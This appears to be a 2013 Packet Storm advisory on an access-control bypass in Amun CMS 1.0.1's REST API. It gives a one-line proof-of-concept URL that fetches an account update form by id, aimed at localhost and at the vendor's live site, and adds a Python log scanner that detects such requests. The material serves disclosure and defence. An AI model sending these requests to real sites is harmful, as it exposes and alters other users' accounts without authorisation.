Amun CMS 1.0.1 REST API Access Bypass

2013-10-11T00:00:00
ID PACKETSTORM:123586
Type packetstorm
Reporter syst3m_f4ult
Modified 2013-10-11T00:00:00

Description

                                        
`Amun CMS 1.0.1 REST API No Access Restriction  
  
Author : syst3m_f4ult  
Homepage : http://amun-project.org  
Vendor : Amun CMS  
Version : 1.0.1 (probably all versions)  
Tested on : ubuntu 12.04  
Date : 2013-10-11  
-----------------------------------------------------------------------  
I. POC & Exploit  
-----------------------------------------------------------------------  
Default : http://127.0.0.1/  
  
exploit : http://127.0.0.1/index.php/api/user/account/form?format=xml&method=update&id=1  
  
Demo :  
http://amun-project.org/index.php/api/user/account/form?format=xml&method=update&id=1  
`
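
A log check for the endpoint named in the PoC above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to the account form API and reports, per client, which `id` values were answered with a 2xx status. Combined Log Format is assumed; the sample log lines and the name `find_form_hits` are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Start of a Combined Log Format line: client, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# API path taken from the advisory's PoC URL.
FORM_PATH = re.compile(r'/api/user/account/form/?$')

# Constructed sample input (documentation address ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [11/Oct/2013:10:00:01 +0000] "GET /index.php/api/user/account/form?format=xml&method=update&id=1 HTTP/1.1" 200 2310
198.51.100.7 - - [11/Oct/2013:10:00:02 +0000] "GET /index.php/api/user/account/form?format=xml&method=update&id=2 HTTP/1.1" 200 2290
203.0.113.9 - - [11/Oct/2013:10:01:10 +0000] "GET /index.php/news HTTP/1.1" 200 5120
203.0.113.9 - - [11/Oct/2013:10:01:12 +0000] "GET /index.php/api/user/account/form?format=xml&method=update&id=5 HTTP/1.1" 403 120
"""

def find_form_hits(log_text):
    """Map client IP -> account ids served (2xx) and count of refused requests."""
    hits = defaultdict(lambda: {"served": set(), "denied": 0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m["target"])
        if not FORM_PATH.search(unquote(url.path)):
            continue  # some other page or API endpoint
        qs = parse_qs(url.query)
        if qs.get("method", [""])[0].lower() != "update":
            continue  # only the form variant shown in the advisory
        rec = hits[m["ip"]]
        if m["status"].startswith("2"):
            rec["served"].update(qs.get("id", []))  # the form was returned
        else:
            rec["denied"] += 1  # the server refused the request
    return {ip: {"served": sorted(r["served"]), "denied": r["denied"]}
            for ip, r in hits.items()}

if __name__ == "__main__":
    for ip, rec in find_form_hits(SAMPLE_LOG).items():
        print(ip, "served ids:", rec["served"], "denied:", rec["denied"])
```

A client with several distinct `served` ids is walking account records; once access control is in place on the API, the same requests should appear under `denied` instead.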